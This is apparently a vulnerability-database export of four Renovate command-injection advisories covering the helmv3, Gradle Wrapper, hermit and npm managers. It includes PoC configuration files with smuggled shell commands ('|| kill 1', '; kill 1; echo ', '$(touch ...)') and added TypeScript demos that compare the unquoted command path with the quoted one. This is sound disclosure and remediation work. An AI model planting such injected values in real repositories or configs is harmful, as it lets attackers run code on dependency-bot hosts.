| Affected_by_vulnerabilities |
| 0 |
| url |
VCID-cqbc-m5e2-tfaj |
| vulnerability_id |
VCID-cqbc-m5e2-tfaj |
| summary |
Renovate vulnerable to arbitrary command injection via helmv3 manager and malicious Chart.yaml file
### Summary
The user-provided string `repository` in the `helmv3` manager is appended to the `helm registry login` command without proper sanitization.
### Details
Adversaries can provide a maliciously crafted `Chart.yaml` in conjunction with a tweaked Renovate configuration file to trick Renovate into executing arbitrary code.
The values at both uses of the `repository` variable in [lib/modules/manager/helmv3/common.ts](https://github.com/renovatebot/renovate/blob/b69416ce1745f67c9fc1d149738e2f52feb4f732/lib/modules/manager/helmv3/common.ts) are not escaped with the `quote` function from the `shlex` package.
This lack of proper sanitization has been present in the product since version 31.51.0 (https://github.com/renovatebot/renovate/commit/f372a68144a4d78c9f7f418168e4efe03336a432), released on January 24, 2022.
### PoC
1. Create a git repo with the following content:
`renovate.json5`:
```json5
{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"99999.0.0"}]}'],
    },
  },
  // Register any credentials to make the manager attempt to use basic auth for the Helm registry
  hostRules: [
    {
      matchHost: "charts.bitnami.com",
      username: "un",
      password: "pw",
    },
  ],
  packageRules: [
    {
      // Target of the day
      matchManagers: ["helmv3"],
      // Don't consult the actual bitnami repo
      registryUrls: [],
      // But still, trick the manager into believing there's a new version
      overrideDatasource: "custom.always",
    },
  ],
}
```
`Chart.yaml`:
```yaml
apiVersion: v2
name: renovate-aci-1
version: 0.0.1
dependencies:
  - name: redis
    version: 0.1.0
    repository: oci://charts.bitnami.com/bitnami || kill 1
```
`Chart.lock`:
```yaml
dependencies:
  - name: redis
    repository: oci://charts.bitnami.com/bitnami
```
2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the arbitrary command injection (ACI) allowed `kill 1` to run, terminating the root process of the container.
> [!NOTE]
> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual Helm registry on the malformed repository URL.
### Impact
This is an arbitrary command injection vulnerability: anyone with write access to a repository that Renovate is configured to scan can cause commands of their choice to run on the machine that runs Renovate. |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-3f44-xw83-3pmg
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-cqbc-m5e2-tfaj |
|
| 1 |
| url |
VCID-e5zm-81zq-9kba |
| vulnerability_id |
VCID-e5zm-81zq-9kba |
| summary |
Renovate vulnerable to arbitrary command injection via Gradle Wrapper and malicious `distributionUrl`
### Summary
Renovate can be tricked into executing shell code while updating the Gradle Wrapper. A malicious `distributionUrl` in `gradle/wrapper/gradle-wrapper.properties` can lead to command execution in the Renovate runtime.
### Details
When Renovate handles Gradle Wrapper artifacts, it may run a wrapper update command such as:
- `./gradlew :wrapper --gradle-distribution-url <value>`
In the observed behavior, Renovate executes this via a shell (e.g., `/bin/sh -c ...`).
If `distributionUrl` contains shell command substitution syntax like `$(...)`, the shell evaluates it **before** Gradle validates/parses the URL.
After that, Gradle attempts to parse the URL as a URI and fails with `URISyntaxException`, but the shell substitution has already executed.
This is reproducible even when `allowScripts` is disabled (default is OFF), because this execution happens as part of Gradle Wrapper artifact handling rather than “repository install scripts”.
Prerequisites / attack conditions:
- The attacker must be able to get a malicious `gradle-wrapper.properties` into a repository that Renovate scans (e.g., direct write access, or a maintainer merges an attacker’s change/PR).
- Renovate must be configured to process Gradle Wrapper updates/artifacts for that repository (default behavior for the Gradle Wrapper manager).
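The Gradle Wrapper case above hinges on the URL being spliced into a string that `/bin/sh -c` parses. The TypeScript below is an added example written for this page, not Renovate's own code: it pulls `distributionUrl` out of a constructed `gradle-wrapper.properties`, runs the wrapper command the vulnerable way (a command string through `sh -c`, with a shell function standing in for `./gradlew` so Gradle does not need to be installed) and the hardened way (an argv array via `execFileSync`, with `printf` as the stand-in), and shows that only the shell path runs the `$(...)` payload. The strict allowlist in `isSafeDistributionUrl` is this example's assumption, not a check Renovate performs; the flag name `--gradle-distribution-url` is the one quoted in the advisory, and the sample properties content is constructed.

```typescript
// Added example, not Renovate's code: how a shell-interpolated Gradle wrapper
// command evaluates $(...) inside distributionUrl, and two ways to stop it.
import { execFileSync, execSync } from "node:child_process";
import { existsSync, mkdtempSync, rmSync } from "node:fs";
import { tmpdir } from "node:os";
import { join } from "node:path";

// Pull distributionUrl out of gradle-wrapper.properties text. Java .properties
// files escape ':' as '\:' so the raw value reads "https\://..."; undo that.
export function readDistributionUrl(properties: string): string | undefined {
  for (const raw of properties.split("\n")) {
    const line = raw.trim();
    const eq = line.indexOf("=");
    if (line.startsWith("#") || eq < 0) continue;
    if (line.slice(0, eq).trim() === "distributionUrl") {
      return line.slice(eq + 1).trim().replace(/\\:/g, ":");
    }
  }
  return undefined;
}

// Conservative allowlist (this example's assumption, not a Renovate check):
// http(s) scheme and only characters that are inert in a POSIX shell.
export function isSafeDistributionUrl(url: string): boolean {
  return /^https?:\/\/[A-Za-z0-9._\-\/:%+=]+$/.test(url);
}

// Stand-in for ./gradlew: a shell function that echoes its argv one per line,
// so we can see what Gradle would receive without Gradle installed.
const FAKE_GRADLEW = 'gradlew() { printf "%s\\n" "$@"; }; ';

// Vulnerable pattern: the URL is interpolated into a string that /bin/sh -c
// parses, so command substitution runs before gradlew sees any argument.
export function wrapperUpdateViaShell(distributionUrl: string): string[] {
  const cmd = `gradlew :wrapper --gradle-distribution-url ${distributionUrl}`;
  const out = execSync(FAKE_GRADLEW + cmd, { shell: "/bin/sh", encoding: "utf8" });
  return out.trimEnd().split("\n");
}

// Hardened pattern: argv array and no shell. printf stands in for gradlew
// exactly as the shell function does; the payload is passed through literally.
export function wrapperUpdateNoShell(distributionUrl: string): string[] {
  const out = execFileSync(
    "printf",
    ["%s\n", ":wrapper", "--gradle-distribution-url", distributionUrl],
    { encoding: "utf8" },
  );
  return out.trimEnd().split("\n");
}

// Drive both paths with a payload that drops a marker file and report whether
// the marker appeared: [createdByShellPath, createdByArgvPath].
export function demo(): [boolean, boolean] {
  const dir = mkdtempSync(join(tmpdir(), "wrapper-aci-"));
  const marker = join(dir, "pwned");
  // Constructed malicious gradle-wrapper.properties content (not from a real repo).
  const properties = [
    "distributionBase=GRADLE_USER_HOME",
    "distributionPath=wrapper/dists",
    `distributionUrl=https\\://services.gradle.org/distributions/gradle-8.5-bin.zip$(touch ${marker})`,
  ].join("\n");
  const url = readDistributionUrl(properties)!;
  try {
    wrapperUpdateViaShell(url);
    const viaShell = existsSync(marker);
    if (viaShell) rmSync(marker);
    wrapperUpdateNoShell(url);
    const noShell = existsSync(marker);
    return [viaShell, noShell];
  } finally {
    rmSync(dir, { recursive: true, force: true });
  }
}
```

WHATWG `new URL()` happily accepts `$`, `(` and `)` in a path, so parsing the URL on the Node side would not by itself have rejected the PoC payload; the substantive fix is the argv form, which never hands the string to a shell, with the allowlist as defence in depth.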
### PoC
1. Create a repository with a Gradle Wrapper (`gradlew`, `gradlew.bat`, `gradle/wrapper/gradle-wrapper.jar`, and `gradle/wrapper/gradle-wrapper.properties`).
2. Set `distributionUrl` in `gradle-wrapper.properties` to include `$(...)`.
3. Run Renovate against the repository.
4. Observe that a file is created during Renovate’s wrapper update step **before** Gradle fails with `URISyntaxException`.
A [screen recording](https://drive.google.com/file/d/1nveSCgyz4pKPCZuelqDD_xGEO00DXr4P/view) is attached showing end-to-end reproduction. In the demo, the payload creates `/tmp/passwd_dump` containing `/etc/passwd`, demonstrating that file read/exfiltration is possible within the Renovate execution context.
### Impact
This allows arbitrary command execution in the Renovate runtime during Gradle Wrapper updates. Depending on deployment, this may expose credentials/tokens available to the bot and may allow an attacker to modify repositories or access internal resources reachable from the Renovate environment.
### Remediation
Upgrading to Renovate [42.68.5](https://github.com/renovatebot/renovate/releases/tag/42.68.5) (2025-12-31) fixes this issue, and closes out other risks of shell evaluation for commands run by Renovate.
If using the `composer`, `yarn` (v1) or `flux` managers, please upgrade to [42.74.5](https://github.com/renovatebot/renovate/releases/tag/42.74.5) (2026-01-08), as there were follow-up fixes to keep these managers working. |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-pfq2-hh62-7m96
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-e5zm-81zq-9kba |
|
| 2 |
| url |
VCID-erkn-fu4w-zygm |
| vulnerability_id |
VCID-erkn-fu4w-zygm |
| summary |
Renovate vulnerable to arbitrary command injection via hermit manager and maliciously named dependencies
### Summary
The user-provided string `depName` in the `hermit` manager is appended to the `./hermit install` and `./hermit uninstall` commands without proper sanitization.
### Details
Adversaries can provide a maliciously named hermit dependency in conjunction with a tweaked Renovate configuration file to trick Renovate into executing arbitrary code.
All values added to the `packagesToInstall` and `packagesToUninstall` variables in [lib/modules/manager/hermit/artifacts.ts](https://github.com/renovatebot/renovate/blob/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c/lib/modules/manager/hermit/artifacts.ts) are not escaped with the `quote` function from the `shlex` package.
This lack of proper sanitization for installing packages has been present in the product since the introduction of the hermit manager in version 32.135.0 (https://github.com/renovatebot/renovate/commit/b696abb3c2741508fbb4029f39153140a3722e1e), released on July 30 of 2022.
In version 37.199.1 (https://github.com/renovatebot/renovate/commit/eaec10d7c8afadbdd783ac47bd2adbfab444d6df) some use of the `quote` function from the `shlex` package was added, but not in a way that usefully prevented this arbitrary code injection vulnerability.
When support for replacements was introduced with version 37.214.4 (https://github.com/renovatebot/renovate/commit/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c), the same faulty approach was replicated for uninstalling packages.
### PoC
1. Create a git repo with the following content:
`renovate.json5`:
```json5
{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"99999.0.0"}]}'],
    },
  },
  packageRules: [
    {
      // Target of the day
      matchManagers: ["hermit"],
      // Trick the manager into believing there's a new version
      overrideDatasource: "custom.always",
    },
  ],
}
```
`bin/hermit`:
```bash
#!/bin/bash
#
# THIS FILE IS GENERATED; DO NOT MODIFY
set -eo pipefail
export HERMIT_USER_HOME=~
if [ -z "${HERMIT_STATE_DIR}" ]; then
  case "$(uname -s)" in
    Darwin)
      export HERMIT_STATE_DIR="${HERMIT_USER_HOME}/Library/Caches/hermit"
      ;;
    Linux)
      export HERMIT_STATE_DIR="${XDG_CACHE_HOME:-${HERMIT_USER_HOME}/.cache}/hermit"
      ;;
  esac
fi
export HERMIT_DIST_URL="${HERMIT_DIST_URL:-https://github.com/cashapp/hermit/releases/download/stable}"
HERMIT_CHANNEL="$(basename "${HERMIT_DIST_URL}")"
export HERMIT_CHANNEL
export HERMIT_EXE=${HERMIT_EXE:-${HERMIT_STATE_DIR}/pkg/hermit@${HERMIT_CHANNEL}/hermit}
if [ ! -x "${HERMIT_EXE}" ]; then
  echo "Bootstrapping ${HERMIT_EXE} from ${HERMIT_DIST_URL}" 1>&2
  INSTALL_SCRIPT="$(mktemp)"
  # This value must match that of the install script
  INSTALL_SCRIPT_SHA256="09ed936378857886fd4a7a4878c0f0c7e3d839883f39ca8b4f2f242e3126e1c6"
  if [ "${INSTALL_SCRIPT_SHA256}" = "BYPASS" ]; then
    curl -fsSL "${HERMIT_DIST_URL}/install.sh" -o "${INSTALL_SCRIPT}"
  else
    # Install script is versioned by its sha256sum value
    curl -fsSL "${HERMIT_DIST_URL}/install-${INSTALL_SCRIPT_SHA256}.sh" -o "${INSTALL_SCRIPT}"
    # Verify install script's sha256sum
    openssl dgst -sha256 "${INSTALL_SCRIPT}" | \
      awk -v EXPECTED="$INSTALL_SCRIPT_SHA256" \
        '$2!=EXPECTED {print "Install script sha256 " $2 " does not match " EXPECTED; exit 1}'
  fi
  /bin/bash "${INSTALL_SCRIPT}" 1>&2
fi
exec "${HERMIT_EXE}" --level=fatal exec "$0" -- "$@"
```
`bin/.|| kill 1 ||@0.0.1.pkg` (symlink):
A symlink to `hermit`
2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the arbitrary command injection (ACI) allowed `kill 1` to run, terminating the root process of the container.
> [!NOTE]
> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual hermit-packages repository during resolution.
### Impact
This is an arbitrary command injection vulnerability: anyone with write access to a repository that Renovate is configured to scan can cause commands of their choice to run on the machine that runs Renovate. |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-36j9-mx87-2cff
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-erkn-fu4w-zygm |
|
| 3 |
| url |
VCID-uaf4-6678-xke8 |
| vulnerability_id |
VCID-uaf4-6678-xke8 |
| summary |
Renovate vulnerable to arbitrary command injection via npm manager and malicious Renovate configuration
### Summary
The user-provided string `packageName` in the `npm` manager is appended to the `npm install` command during lock maintenance without proper sanitization.
### Details
Adversaries can provide a maliciously crafted Renovate configuration file to trick Renovate into executing arbitrary code.
The user-provided workspace names and package keys that are added to the `updateCmd` variables in [lib/modules/manager/npm/post-update/npm.ts](https://github.com/renovatebot/renovate/blob/5bdaf47eebde770107017c47557bca41189db588/lib/modules/manager/npm/post-update/npm.ts) are not escaped with the `quote` function from the `shlex` package.
This lack of proper sanitization has been present in the product since version 35.63.0 (https://github.com/renovatebot/renovate/commit/012c0ac2fe32832e60a62bde405c0a241efd314c), released on April 27, 2023.
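The helmv3, hermit and npm advisories on this page describe the same defect: a user-controlled token concatenated into a command string that is then run through a shell, with no `shlex` `quote()` applied. The TypeScript below is an added example for this page, not Renovate's code. `shQuote` reimplements the `quote()` contract so the block has no dependency on the `shlex` npm package, `buildCommand` builds the command line either unquoted (the bug) or quoted (the fix), and `runInShell` executes it under `/bin/sh -c` with the tool replaced by a shell function that prints its argv and then exits 1, as `helm registry login` does on a malformed repository URL, so an injected `||` branch actually runs. The three payloads are constructed from the PoCs with `kill 1` replaced by `echo INJECTED`; the command shapes (`helm registry login <repo>`, `hermit install <dep>@<version>`, `npm install <pkg>@<version>`) are illustrative and do not reproduce Renovate's exact argument lists.

```typescript
// Added example, not Renovate's code: the unquoted-argument bug shared by the
// helmv3, hermit and npm advisories, and the shlex quote()-style fix.
import { spawnSync } from "node:child_process";

// Same contract as quote() from the shlex npm package (or Python's shlex.quote):
// return the string unchanged if it only has shell-inert characters, otherwise
// wrap it in single quotes and splice any embedded single quote as '\''.
export function shQuote(s: string): string {
  if (s === "") return "''";
  if (/^[A-Za-z0-9_@%+=:,./-]+$/.test(s)) return s;
  return `'${s.replace(/'/g, `'\\''`)}'`;
}

// Build the command line the way the vulnerable managers did (plain string
// concatenation) or the way the fix does (every user-controlled token quoted).
export function buildCommand(tool: string, args: string[], quoted: boolean): string {
  return [tool, ...args.map((a) => (quoted ? shQuote(a) : a))].join(" ");
}

// Run a command string under /bin/sh -c, with the named tool replaced by a shell
// function that prints its argv one per line and then exits 1 (as `helm registry
// login` does on a malformed repository URL), so an injected `||` branch runs.
export function runInShell(tool: string, cmd: string): { argv: string[]; injected: boolean } {
  const fake = `${tool}() { printf "%s\\n" "$@"; return 1; }; `;
  const { stdout } = spawnSync("/bin/sh", ["-c", fake + cmd], { encoding: "utf8" });
  const lines = stdout === "" ? [] : stdout.trimEnd().split("\n");
  return { argv: lines.filter((l) => l !== "INJECTED"), injected: lines.includes("INJECTED") };
}

// Constructed payloads shaped like the three advisories' PoCs, with `kill 1`
// swapped for `echo INJECTED` so the demo is harmless. Command shapes are
// illustrative; Renovate's real argument lists differ.
export const cases = {
  helmv3: { tool: "helm", args: ["registry", "login", "oci://charts.bitnami.com/bitnami || echo INJECTED"] },
  hermit: { tool: "hermit", args: ["install", ".|| echo INJECTED ||@0.0.1"] },
  npm: { tool: "npm", args: ["install", "; echo INJECTED; echo @11.1.0"] },
} as const;

type Outcome = { vulnerable: boolean; fixed: boolean; fixedArgc: number };

// For each manager: did the unquoted build get injected, did the quoted build
// get injected, and how many argv entries did the tool see in the quoted build
// (the whole payload should arrive as exactly one argument).
export function demo(): Record<string, Outcome> {
  const out: Record<string, Outcome> = {};
  for (const [name, c] of Object.entries(cases)) {
    const vuln = runInShell(c.tool, buildCommand(c.tool, [...c.args], false));
    const fixed = runInShell(c.tool, buildCommand(c.tool, [...c.args], true));
    out[name] = { vulnerable: vuln.injected, fixed: fixed.injected, fixedArgc: fixed.argv.length };
  }
  return out;
}
```

Quoting makes the shell deliver the attacker's string to the tool as one argument, which is the point of the fix; whether the tool then rejects that argument (a bad repository URL, an unknown hermit package) is the tool's business and no longer a code-execution path.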
### PoC
1. Create a git repo with the following content:
`renovate.json5`:
```json5
{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"11.1.0"}]}'],
    },
  },
  packageRules: [
    {
      // Target of the day
      matchManagers: ["npm"],
      // Provide a command in the package name
      overridePackageName: "; kill 1; echo ",
      // Override the datasource to prevent a lookup failure
      overrideDatasource: "custom.always",
    },
  ],
}
```
`package.json`:
```json
{
  "name": "renovate-aci-4",
  "version": "0.0.1",
  "dependencies": {
    "uuid": "^11.0.0"
  }
}
```
`package-lock.json`:
```json
{
  "name": "renovate-aci-4",
  "version": "0.0.1",
  "lockfileVersion": 3,
  "requires": true,
  "packages": {
    "": {
      "name": "renovate-aci-4",
      "version": "0.0.1",
      "dependencies": {
        "uuid": "^11.0.0"
      }
    },
    "node_modules/uuid": {
      "version": "11.0.0",
      "resolved": "https://registry.npmjs.org/uuid/-/uuid-11.0.0.tgz",
      "integrity": "sha512-iE8Fa5fgBY4rN5GvNUJ8TSwO1QG7TzdPfhrJczf6XJ6mZUxh/GX433N70fCiJL9h8EKP5ayEIo0Q6EBQGWHFqA==",
      "funding": [
        "https://github.com/sponsors/broofa",
        "https://github.com/sponsors/ctavan"
      ],
      "license": "MIT",
      "bin": {
        "uuid": "dist/esm/bin/uuid"
      }
    }
  }
}
```
2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the arbitrary command injection (ACI) allowed `kill 1` to run, terminating the root process of the container.
> [!NOTE]
> This specific proof of concept relies on the introduction of the `overrideDatasource` and `overridePackageName` configuration, available since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024.
### Impact
This is an arbitrary command injection vulnerability: anyone with write access to a repository that Renovate is configured to scan can cause commands of their choice to run on the machine that runs Renovate. |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-fr4j-65pv-gjjj
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-uaf4-6678-xke8 |
|
|